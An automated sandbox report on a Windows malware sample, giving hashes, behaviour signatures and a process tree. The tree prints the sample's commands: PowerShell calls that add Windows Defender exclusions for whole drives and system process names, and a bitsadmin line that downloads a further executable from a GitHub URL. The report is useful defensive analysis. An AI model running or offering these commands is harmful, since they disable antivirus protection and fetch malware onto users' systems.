Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2024, 01:38

General

  • Target

    d538155f9d03a9109f09d716733bba969677f569171852afabad28993d6b5dde.exe

  • Size

    46KB

  • MD5

    a66e7a2216c3bbea30a25a82acff1022

  • SHA1

    472c1c23e1444f595791bbd53b8d2619250ae727

  • SHA256

    d538155f9d03a9109f09d716733bba969677f569171852afabad28993d6b5dde

  • SHA512

    419655c5063b080be51e266ed5281ec97593de47d9fbdd998b7b2e58bea0f414d0725a127deeb8ae18d56aeed8c1650d5b508b6eef7aa77782e5f4a9657fd564

  • SSDEEP

    768:6oCKLEXpREtWHWqXTst7IOL6jiAYHyvj7dehVQdIwHzEypFYeuoGAto6hlUcuW1R:KPKoz

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d538155f9d03a9109f09d716733bba969677f569171852afabad28993d6b5dde.exe
    "C:\Users\Admin\AppData\Local\Temp\d538155f9d03a9109f09d716733bba969677f569171852afabad28993d6b5dde.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxikiit.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2924
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension ".tmp"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2828
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "svchost.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:\"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2688
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "RuntimeBroker.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2352
        • C:\Windows\system32\bitsadmin.exe
          bitsadmin /transfer jobName /download /priority normal "https://github.com/ZeRysXCoder/main/raw/refs/heads/main/td.exe" "C:\Users\Admin\AppData\Local\Microsoft\td.exe"
          3⤵
          • Download via BitsAdmin
          PID:2608

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\cxikiit.bat

            Filesize

            1KB

            MD5

            a7f0cda82b705c7d58ba8aba11ed516e

            SHA1

            3491764124bca8465f47b047079836704817c35a

            SHA256

            0dfc0d6eb380ee5b7a58bb70296993a360c77e4fbb42f278119d91def3c427a4

            SHA512

            a0ec900d2e30b92b0091b1d6f360be357f2a472ddba8f2da5bf12f4b3d1957ea9eb84d9019d62c564c62dcf5d43eb153b43b3a5db0f65ffd2837505ca932e875

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            4ab9970d925a9710a6ae02890190f51e

            SHA1

            4f8d1b1a597cdbe01c9e14931d34438e55a46eba

            SHA256

            5b724fbd88cdc3e8896dc2d2b298abe767d164755dab404ef66f8a080da0d3c2

            SHA512

            8dd315edd61284fad797d7ef238359a035835ce9f30310fad7ad465b379fe10e7c57d59bcd551ed5ee55460e75670847beefd7c569f07d041ca9d75aba1bb525

          • memory/1348-0-0x000007FEF4C13000-0x000007FEF4C14000-memory.dmp

            Filesize

            4KB

          • memory/1348-1-0x0000000001220000-0x0000000001232000-memory.dmp

            Filesize

            72KB

          • memory/2828-15-0x000000001B270000-0x000000001B552000-memory.dmp

            Filesize

            2.9MB

          • memory/2828-16-0x0000000002220000-0x0000000002228000-memory.dmp

            Filesize

            32KB

          • memory/3060-23-0x000000001B320000-0x000000001B602000-memory.dmp

            Filesize

            2.9MB

          • memory/3060-24-0x00000000025A0000-0x00000000025A8000-memory.dmp

            Filesize

            32KB